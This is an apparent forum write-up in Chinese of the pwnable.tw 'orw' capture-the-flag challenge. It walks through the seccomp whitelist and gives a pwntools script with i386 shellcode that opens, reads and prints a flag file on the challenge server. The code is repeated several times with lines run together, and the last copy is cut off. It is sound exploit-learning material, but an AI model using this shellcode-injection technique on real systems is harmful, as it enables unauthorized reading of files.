-
-
Pwnable.tw orw writeup
-
发表于: 2021-6-15 15:39
-
https://pwnable.tw/challenge/#2
➜ orw checksec ./orw
[*] '/mnt/hgfs/share/ctf/tw/orw/orw'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
其中seccomp是一个开启内核system call保护的函数。通过这一函数可以划定程序准许用户态调用的系统函数,相当于划定白名单,即题目所言【仅开启了open、write、read】。
可以使用工具查看seccomp保护规则
https://github.com/david942j/seccomp-tools
安装方法
sudo apt install gcc ruby-dev
sudo gem install seccomp-tools
使用方法
➜ orw seccomp-tools dump ./orw
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x09 0x40000003 if (A != ARCH_I386) goto 0011
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x07 0x00 0x000000ad if (A == rt_sigreturn) goto 0011
0004: 0x15 0x06 0x00 0x00000077 if (A == sigreturn) goto 0011
0005: 0x15 0x05 0x00 0x000000fc if (A == exit_group) goto 0011
0006: 0x15 0x04 0x00 0x00000001 if (A == exit) goto 0011
0007: 0x15 0x03 0x00 0x00000005 if (A == open) goto 0011
0008: 0x15 0x02 0x00 0x00000003 if (A == read) goto 0011
0009: 0x15 0x01 0x00 0x00000004 if (A == write) goto 0011
0010: 0x06 0x00 0x00 0x00050026 return ERRNO(38)
0011: 0x06 0x00 0x00 0x7fff0000 return ALLOW
简单分析函数可知,该程序直接执行了用户输入的shellcode。结合题目意思,可以使用open函数打开flag文件,然后read读出文件内容,最后write输出到控制台。
使用的python程序如下:
使用pwntools的shellcraft来构造shellcode。
当然也可以自己写:前提是需要对系统调用的参数传递比较熟悉,eax为系统调用号,ebx,ecx,edx依次为传递的参数。
from pwn import *
context(arch='i386',os='linux')
context(log_level='debug')
io = remote('chall.pwnable.tw',10001)
#https://docs.pwntools.com/en/stable/shellcraft.htmls = ''
s+=shellcraft.open("/home/orw/flag")
s += shellcraft.read('eax','ebp',0x100)
s += shellcraft.write(1,'ebp',0x100)
s += '''
\nnext:jmp next'''io.recvuntil(':')
io.send(asm(s))io.interactive()from pwn import *
context(arch='i386',os='linux')
context(log_level='debug')
io = remote('chall.pwnable.tw',10001)
#https://docs.pwntools.com/en/stable/shellcraft.htmls = ''
s+=shellcraft.open("/home/orw/flag")
s += shellcraft.read('eax','ebp',0x100)
s += shellcraft.write(1,'ebp',0x100)
s += '''
\nnext:jmp next'''io.recvuntil(':')
io.send(asm(s))io.interactive()from pwn import *
context(arch='i386',os='linux')
context(log_level='debug')
io = remote('chall.pwnable.tw',10001)
#https://docs.pwntools.com/en/stable/shellcraft.htmls = ''
s+='''
/* open(file='/home/orw/flag', oflag=0, mode=0) */
/* push b'/home/orw/flag\x00' */
push 0x1010101
xor dword ptr [esp], 0x1016660
push 0x6c662f77
push 0x726f2f65
push 0x6d6f682f
mov ebx, esp
xor ecx, ecx
xor edx, edx
/* call open() */
push 5 /* 5 */
pop eax
int 0x80
'''s += '''
/* read(fd='eax', buf='ebp', nbytes=0x100) */ mov ebx, eax
mov ecx, ebp
xor edx, edx
mov dh, 0x100 >> 8
/* call read() */
push 3 /* 3 */
pop eax
int 0x80
'''s += '''
/* write(fd=1, buf='ebp', n=0x100) */
push 1
pop ebx
mov ecx, ebp
xor edx, edx
mov dh, 0x100 >> 8
/* call write() */
push 4 /* 4 */
pop eax
int 0x80
'''s += '''
\nnext:jmp next'''io.recvuntil(':')
io.send(asm(s))io.interactive()from pwn import *
context(arch='i386',os='linux')
context(log_level='debug')
io = remote('chall.pwnable.tw',10001)
#https://docs.pwntools.com/en/stable/shellcraft.htmls = ''
s+='''
/* open(file='/home/orw/flag', oflag=0, mode=0) */
/* push b'/home/orw/flag\x00' */
push 0x1010101
xor dword ptr [esp], 0x1016660
push 0x6c662f77
push 0x726f2f65
push 0x6d6f682f
mov ebx, esp
xor ecx, ecx
xor edx, edx
/* call open() */
push 5 /* 5 */
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
